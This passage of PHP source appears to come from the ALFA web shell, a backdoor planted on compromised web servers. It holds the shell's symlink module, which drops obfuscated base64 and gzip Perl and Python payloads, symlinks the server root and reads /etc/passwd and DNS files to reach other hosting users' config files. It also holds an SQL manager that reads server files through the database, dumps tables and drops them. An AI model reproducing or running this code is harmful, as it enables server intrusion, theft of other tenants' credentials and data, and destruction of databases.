4601 $lines = _alfa_file('/etc/passwd');
4602 $state = "passwd";
4603 }
4604 }
4605 }
4606 return array("lines" => $lines, "state" => $state);
4607}
4608function alfasymlink(){
4609alfahead();
4610AlfaNum(9,10);
4611echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
4612if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
4613 $sympath = alfaMakePwd();
4614 @mkdir('cgialfa',0755);
4615 @chdir('cgialfa');
4616 alfacgihtaccess('cgi');
4617 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
4618 $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
4619 $cginame = "symperl.alfa";
4620 $source = $perl;
4621 $lang = "perl";
4622 if($_POST["alfa2"]=="sympy"){
4623 $cginame = "pysymlink.alfa";
4624 $source = $py;
4625 $lang = "python";
4626 }
4627 @__write_file($cginame,$source);
4628 @chmod($cginame,0755);
4629 echo __pre();
4630 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
4631 if(strlen($resource) == 0){
4632 echo AlfaiFrameCreator('cgialfa/'.$cginame);
4633 }else{
4634 echo $resource;
4635 }
4636}
4637if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
4638if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
4639AlfaNum(9,10);
4640echo __pre().'
4641<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
4642<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
4643<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
4644<p><input type="submit" value=" " name="symlink" /></p></form></center>';
4645$path = $_POST['alfa5'];
4646$symname = $_POST['alfa6'];
4647$solevisible58 = $_POST['alfa7'];
4648if($solevisible58){
4649$new_name = str_replace(".", "_", basename($symname));
4650$rand_dir = $new_name.rand(111,9999);
4651$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
4652@mkdir($sym_dir, 0777, true);
4653alfacgihtaccess('sym', $sym_dir, $symname);
4654_alfa_symlink("$path","$sym_dir/$symname");
4655echo __pre();
4656echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
4657}
4658}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
4659}
4660if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
4661$cant_symlink = true;
4662if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
4663@mkdir('alfasymlink',0777);
4664alfacgihtaccess('sym','alfasymlink/');
4665_alfa_symlink('/','alfasymlink/root');
4666$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
4667if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
4668echo "<center>";
4669$lines = array();
4670$anony_domains = array();
4671$anonymous_users = array();
4672$f_black = array();
4673$error = false;
4674$anonymous = false;
4675$makepwd = "/home/{user}/public_html/";
4676$domains = alfaGetDomains();
4677$lines = $domains["lines"];
4678$state = $domains["state"];
4679$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
4680$can_runcmd = _alfa_can_runCommand(false,false);
4681if(!$is_posix && !$can_runcmd){
4682 $anonymous = true;
4683 $anony_domains = $domains["lines"];
4684 $lines = _alfa_file('/etc/passwd');
4685}
4686echo $table_header;
4687$count=1;
4688$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4689foreach($lines as $line){
4690 $domain = "";
4691 $owner = "";
4692 if($anonymous){
4693 $explode = explode(":", $line);
4694 $owner = $explode[0];
4695 $owner_len = strlen($owner) - 1;
4696 $userid = $explode[2];
4697 if((int)$userid < 500)continue;
4698 $domain = "[?????]";
4699 $temp_black = array();
4700 $finded = false;
4701 foreach($anony_domains as $anony){
4702 if($state == "named.conf"){
4703 if(@strstr($anony, 'zone')){
4704 preg_match_all('#zone "(.*)"#',$anony, $data);
4705 $domain = $data[1][0];
4706 }else{
4707 continue;
4708 }
4709 }elseif($state == "named" || $state == "valiases"){
4710 if($anony == "." || $anony == "..")continue;
4711 if($state == "named")$anony = rtrim($anony, ".db");
4712 $domain = $anony;
4713 }
4714 $sub_domain = str_replace(array("-","."), "", $domain);
4715 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
4716 if(in_array($owner.$domain, $temp_black))continue;
4717 $sympath = str_replace("{user}", $owner, $makepwd);
4718 $http = "http://".$domain;
4719 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4720 $count++;
4721 $temp_black[] = $owner.$domain;
4722 $finded = true;
4723 }
4724 }
4725 if(!$finded){
4726 $anonymous_users[] = $owner;
4727 }
4728 }else{
4729 if($state == "named.conf"){
4730 if(@strstr($line, 'zone')){
4731 preg_match_all('#zone "(.*)"#',$line, $data);
4732 $domain = $data[1][0];
4733 }else{
4734 continue;
4735 }
4736 }elseif($state == "named" || $state == "valiases"){
4737 if($line == "." || $line == "..")continue;
4738 if($state == "named")$line = rtrim($line, ".db");
4739 $domain = $line;
4740 }
4741 if(strlen(trim($domain)) > 2 && $state != "passwd"){
4742 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
4743 if($is_posix){
4744 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
4745 $owner = $user["name"];
4746 }elseif($can_runcmd){
4747 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
4748 }
4749 }
4750 }
4751 if(!$anonymous){
4752 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
4753 $sympath = str_replace("{user}", $owner, $makepwd);
4754 $http = "http://".$domain;
4755 if($state == "passwd"){
4756 $http = "javascript:alert('we cant find domain...')";
4757 }
4758 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4759 $count++;
4760 $f_black[] = $owner.$domain;
4761 }
4762}
4763if($anonymous){
4764 foreach($anonymous_users as $owner){
4765 $sympath = str_replace("{user}", $owner, $makepwd);
4766 $http = "javascript:alert('we cant find domain...')";
4767 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
4768 $count++;
4769 }
4770}
4771$cant_symlink = false;
4772}else{
4773$is_direct = false;
4774$makepwd = alfaMakePwd();
4775if(_alfa_file_exists("/etc/virtual/domainowners")){
4776 $makepwd = "/home/{user}/public_html";
4777 $is_direct = true;
4778}
4779$sole = _alfa_file("/etc/virtual/domainowners");
4780$count=1;
4781echo $table_header;
4782$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4783if($sole){
4784 foreach($sole as $visible){
4785 if(@strstr($visible,":")){
4786 $solevisible = explode(':', $visible);
4787 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
4788 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
4789 }
4790 }
4791}else{
4792 $passwd = _alfa_file("/etc/passwd");
4793 if($passwd){
4794 $html = "";
4795 $is_named = false;
4796 $users = array();
4797 $domains = array();
4798 $uknowns = array();
4799 foreach($passwd as $user){
4800 $user = trim($user);
4801 $expl = explode(":", $user);
4802 if((int)$expl[2] < 500)continue;
4803 $users[$expl[0]] = $expl[5];
4804 }
4805 $site_domains = @scandir("/etc/virtual/");
4806 if(!$site_domains){
4807 $site_domains = alfaEx("ls /etc/virtual/");
4808 $site_domains = explode("\n", $site_domains);
4809 if(!$site_domains){
4810 $site_domains = _alfa_file("/etc/named.conf");
4811 if($site_domains){$is_named = true;}
4812 }
4813 }
4814 foreach($site_domains as $line){
4815 if($is_named){
4816 if(@strstr($line, 'zone')){
4817 preg_match_all('#zone "(.*)"#',$line, $data);
4818 $domain = $data[1][0];
4819 if(strlen($domain > 2) && !empty($domain)){
4820 $domains[] = $domain;
4821 }
4822 }
4823 }else{
4824 $domains[] = $line;
4825 }
4826 }
4827 $x = 1;
4828 foreach($users as $user => $home){
4829 foreach($domains as $domain){
4830 $user_len = strlen($user) - 1;
4831 $sub_domain = str_replace(array("-","."), "", $domain);
4832 $five_user = substr($user, 0,$user_len);
4833 $five_domain = substr($sub_domain, 0,$user_len);
4834 if($five_user == $five_domain){
4835 if($is_direct){
4836 $cwd = str_replace("{user}", $user, $makepwd);
4837 }else{
4838 $expl = explode("}/", $makepwd);
4839 $cwd = $home."/".$expl[1];
4840 }
4841 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
4842 }else{
4843 $uknowns[$user] = $home;
4844 }
4845 }
4846 }
4847 $uknowns = array_unique($uknowns);
4848 foreach($uknowns as $user => $home){
4849 if($is_direct){
4850 $cwd = str_replace("{user}", $user, $makepwd);
4851 }else{
4852 $expl = explode("}/", $makepwd);
4853 $cwd = $home."/".$expl[1];
4854 }
4855 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
4856 }
4857 echo($html);
4858 }
4859}
4860echo "</table>";
4861$cant_symlink = false;
4862}
4863}else{
4864 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
4865 $cant_symlink = false;
4866}
4867if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
4868echo "</center></table>";
4869}
4870echo "</div>";
4871alfafooter();
4872}
4873function alfasql(){
4874if(!isset($_POST['sql_host'])){
4875$_POST['sql_host'] = $_SESSION["sql_host"];
4876$_POST['sql_login'] = $_SESSION["sql_login"];
4877$_POST['sql_pass'] = $_SESSION["sql_pass"];
4878$_POST['sql_base'] = $_SESSION["sql_base"];
4879}
4880class DbClass{
4881public $type;
4882public $link;
4883public $res;
4884function __construct($type){
4885$this->type = $type;
4886}
4887function connect($host, $user, $pass, $dbname){
4888switch($this->type){
4889case 'mysql':
4890if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
4891break;
4892case 'pgsql':
4893$host = explode(':', $host);
4894if(!$host[1]) $host[1]=5432;
4895if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
4896break;
4897}
4898return false;
4899}
4900function selectdb($db){
4901switch($this->type){
4902case 'mysql':
4903if(@mysqli_select_db($db))return true;
4904break;
4905}
4906return false;
4907}
4908function query($str){
4909switch($this->type){
4910case 'mysql':
4911return $this->res = @mysqli_query($this->link,$str);
4912break;
4913case 'pgsql':
4914return $this->res = @pg_query($this->link,$str);
4915break;
4916}
4917return false;
4918}
4919function fetch(){
4920$res = func_num_args()?func_get_arg(0):$this->res;
4921switch($this->type){
4922case 'mysql':
4923return @mysqli_fetch_assoc($res);
4924break;
4925case 'pgsql':
4926return @pg_fetch_assoc($res);
4927break;
4928}
4929return false;
4930}
4931function listDbs(){
4932switch($this->type){
4933case 'mysql':
4934return $this->query("SHOW databases");
4935break;
4936case 'pgsql':
4937return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
4938break;
4939}
4940return false;
4941}
4942function listTables(){
4943switch($this->type){
4944case 'mysql':
4945return $this->res = $this->query('SHOW TABLES');
4946break;
4947case 'pgsql':
4948return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
4949break;
4950}
4951return false;
4952}
4953function error(){
4954switch($this->type){
4955case 'mysql':
4956return @mysqli_error($this->link);
4957break;
4958case 'pgsql':
4959return @pg_last_error();
4960break;
4961}
4962return false;
4963}
4964function setCharset($str){
4965switch($this->type){
4966case 'mysql':
4967if(function_exists('mysql_set_charset'))
4968return @mysqli_set_charset($this->link,$str);
4969else
4970$this->query('SET CHARSET '.$str);
4971break;
4972case 'pgsql':
4973return @pg_set_client_encoding($this->link, $str);
4974break;
4975}
4976return false;
4977}
4978function loadFile($str){
4979switch($this->type){
4980case 'mysql':
4981return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
4982break;
4983case 'pgsql':
4984$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
4985$r=array();
4986while($i=$this->fetch())
4987$r[] = $i['file'];
4988$this->query('drop table solevisible');
4989return array('file'=>implode("\n",$r));
4990break;
4991}
4992return false;
4993}
4994function dump($table, $fp = false){
4995switch($this->type){
4996case 'mysql':
4997$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
4998$create = mysqli_fetch_array($res);
4999$sql = $create[1].";\n";
5000if($fp) fwrite($fp, $sql); else echo($sql);
5001$this->query('SELECT * FROM `'.$table.'`');
5002$head = true;
5003while($item = $this->fetch()){
5004$columns = array();
5005foreach($item as $k=>$v) {
5006if($v == null)
5007$item[$k] = "''";
5008elseif(is_numeric($v))
5009$item[$k] = $v;
5010else
5011$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
5012$columns[] = "`".$k."`";
5013}
5014if($head) {
5015$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
5016$head = false;
5017} else
5018$sql = "\n\t,(".implode(", ", $item).')';
5019if($fp) fwrite($fp, $sql); else echo($sql);
5020}
5021if(!$head)
5022if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
5023break;
5024case 'pgsql':
5025$this->query('SELECT * FROM '.$table);
5026while($item = $this->fetch()) {
5027$columns = array();
5028foreach($item as $k=>$v) {
5029$item[$k] = "'".addslashes($v)."'";
5030$columns[] = $k;
5031}
5032$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
5033if($fp) fwrite($fp, $sql); else echo($sql);
5034}
5035break;
5036}
5037return false;
5038}
5039};
5040$db = new DbClass($_POST['type']);
5041if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
5042$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5043$db->selectdb($_POST['sql_base']);
5044switch($_POST['charset']){
5045case "Windows-1251": $db->setCharset('calfa1251'); break;
5046case "UTF-8": $db->setCharset('utf8'); break;
5047case "KOI8-R": $db->setCharset('koi8r'); break;
5048case "KOI8-U": $db->setCharset('koi8u'); break;
5049case "calfa866": $db->setCharset('calfa866'); break;
5050}
5051$json = json_decode($_POST['alfa2'],true);
5052if(count($json['tbl'])>0){
5053if($_POST['alfa1']=='dumpfile'){
5054if($fp = @fopen($json['file'],'w')){
5055foreach($json['tbl'] as $v)$db->dump($v, $fp);
5056fclose($fp);
5057$dumpStatus = true;
5058}}else{
5059foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
5060}
5061}
5062unset($_POST['alfa2']);
5063}
5064alfahead();
5065echo "
5066<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
5067<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
5068<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
5069<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
5070<td><select name='type'><option value='mysql' ";
5071if(@$_POST['type']=='mysql')echo 'selected';
5072echo ">MySql</option><option value='pgsql' ";
5073if(@$_POST['type']=='pgsql')echo 'selected';
5074echo ">PostgreSql</option></select></td>
5075<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
5076<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
5077<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
5078$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
5079if(isset($_POST['sql_host'])){
5080if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
5081$_SESSION["sql_host"] = $_POST['sql_host'];
5082$_SESSION["sql_login"] = $_POST['sql_login'];
5083$_SESSION["sql_pass"] = $_POST['sql_pass'];
5084$_SESSION["sql_base"] = $_POST['sql_base'];
5085switch($_POST['charset']){
5086case "Windows-1251": $db->setCharset('calfa1251'); break;
5087case "UTF-8": $db->setCharset('utf8'); break;
5088case "KOI8-R": $db->setCharset('koi8r'); break;
5089case "KOI8-U": $db->setCharset('koi8u'); break;
5090case "calfa866": $db->setCharset('calfa866'); break;
5091}
5092$db->setCharset('utf8');
5093$db->listDbs();
5094echo "<select name=sql_base><option value=''></option>";
5095while($item = $db->fetch()) {
5096list($key, $value) = each($item);
5097echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
5098}
5099echo '</select>';
5100}
5101else echo $tmp;
5102}else
5103echo $tmp;
5104echo "</td>
5105<td><input type='submit' value=' '></td>
5106<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
5107</tr>
5108</table>
5109<script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
5110";
5111if(isset($db) && $db->link){
5112echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
5113if(!empty($_POST['sql_base'])){
5114$db->selectdb($_POST['sql_base']);
